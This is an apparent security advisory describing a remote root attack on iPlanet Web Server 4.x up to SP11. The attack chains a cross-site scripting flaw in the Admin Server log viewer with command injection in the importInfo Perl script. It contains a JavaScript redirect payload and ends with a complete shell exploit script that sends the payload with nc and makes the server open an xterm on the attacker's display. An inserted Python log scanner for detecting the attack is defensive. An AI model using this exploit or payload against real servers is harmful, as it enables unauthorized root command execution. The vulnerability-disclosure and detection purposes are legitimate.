Under certain circumstances an attacker can execute commands (usually as root) by combining two security vulnerabilities in iPlanet Web Server 4.* up to SP11 (NG-XSS).
These two vulnerabilities are:
- Insecure open() calls in Admin Server Perl scripts
- Cross-Site Scripting
The only requirement is to get the Administrator, through social engineering, to review the logs within iPlanet Admin Server.
This vulnerability cannot be exploited on a 6.* version because the XSS was silently fixed in those releases.
Credit:
The information has been provided by Fermín J. Serna of Next Generation Security Technologies.
Vulnerable systems:
* iPlanet WebServer version 4.* up to SP11
Taken alone, neither vulnerability gives us a way to execute commands on the iPlanet Web Server: the XSS payload only hijacks the browser, and the vulnerable Perl script is protected by an authentication scheme.
iPlanet Web Server suffers from an XSS vulnerability when the Administrator reviews the error logs through iPlanet Admin Server. The XSS triggers once the Administrator has successfully logged on to the Admin Server.
The trick is not to exploit the Perl open() vulnerability directly, but instead to use the XSS to redirect the Administrator's browser to the URL that causes the open() command injection. Since the Administrator is already authenticated, the authentication scheme is bypassed.
We will use the following JavaScript code:
<scr*ipt>
window.location="/https-admserv/bin/perl/importInfo?dir=|<command>%00";
</scr*ipt>
Recommendations:
Avoid using iPlanet's Admin Server until Sun releases a patch for these vulnerabilities. Alternatively, upgrade to iPlanet v.6.*
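One way to look for traces of this attack chain in server logs before anyone opens them in the Admin Server log viewer, as an added example that is not part of the original advisory. It assumes Common Log Format lines; the sample entries, rule names and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request line inside a Common Log Format entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>.*) HTTP/\d\.\d"')
MARKUP_RE = re.compile(r'<\s*script\b', re.IGNORECASE)
# importInfo request whose dir value starts with a pipe or carries a NUL byte.
IMPORT_RE = re.compile(r'/bin/perl/importInfo\?dir=(?:\s*\||[^&]*\x00)')

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so %2500 -> %00 -> NUL is not missed."""
    for _ in range(max_rounds):
        decoded = unquote(value, encoding="latin-1")
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return the set of findings for one log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return set()
    target = fully_decode(match.group("target"))
    findings = set()
    if MARKUP_RE.search(target):
        findings.add("script-markup-in-request")
    if IMPORT_RE.search(target):
        findings.add("importInfo-pipe-or-nul")
    return findings

# Constructed sample lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Oct/2002:10:00:00 +0200] "GET /index.html HTTP/1.0" 200 512',
    '192.0.2.66 - - [09/Oct/2002:10:01:00 +0200] "GET /<script>window.location='
    '"/https-admserv/bin/perl/importInfo%3Fdir=|<command>%2500";</script> HTTP/1.0" 404 0',
    '192.0.2.20 - admin [09/Oct/2002:10:05:00 +0200] '
    '"GET /https-admserv/bin/perl/importInfo?dir=|<command>%00 HTTP/1.0" 200 0',
]

def scan(lines):
    """Map line number -> findings for every line that matched a rule."""
    return {n: f for n, line in enumerate(lines, 1) if (f := classify(line))}

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG).items():
        print(number, sorted(findings))
```

A hit on the first rule means the entry should be read in a plain-text viewer rather than through the Admin Server; a hit on the second from an authenticated session indicates the redirect already fired.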
Exploit:
#!/bin/sh
#
# iPlanet Remote root exploit
# Tested versions: 4.* up to SP11
#
# By: Fermín J. Serna CTO, NGSEC
# http://www.ngsec.com <fjserna@ngsec.com>
#
# Madrid, 09/10/2002
echo "iPlanet (4.* up to SP11) Remote root exploit by Fermin J. Serna CTO, NGSEC"
echo "http://www.ngsec.com <fjserna@ngsec.com>"
echo
if [ $# != "3" ]
then
echo "Usage: $0 <Web_Server> <Web_port> <IP_to_send_xterm>"
exit
fi
echo "1.- Setting xhost +$1"
xhost +$1
echo
echo "2.- Building XSS string:"
CADENA="<script>window.location=\"/https-admserv/bin/perl/importInfo%3Fdir=|/usr/openwin/bin/xterm+-display+$3:0%2500\";</script>"
echo $CADENA
echo
echo "3.- Sending HTTP request:"
SEND="GET /$CADENA HTTP/1.0"
echo "$SEND"
(echo "$SEND"; echo "Host: $1"; echo; echo) | nc $1 $2
echo
echo
echo "4.- Time to wait for the xterm :P. Admin should review Web Server logs using Admin Server Tool."
echo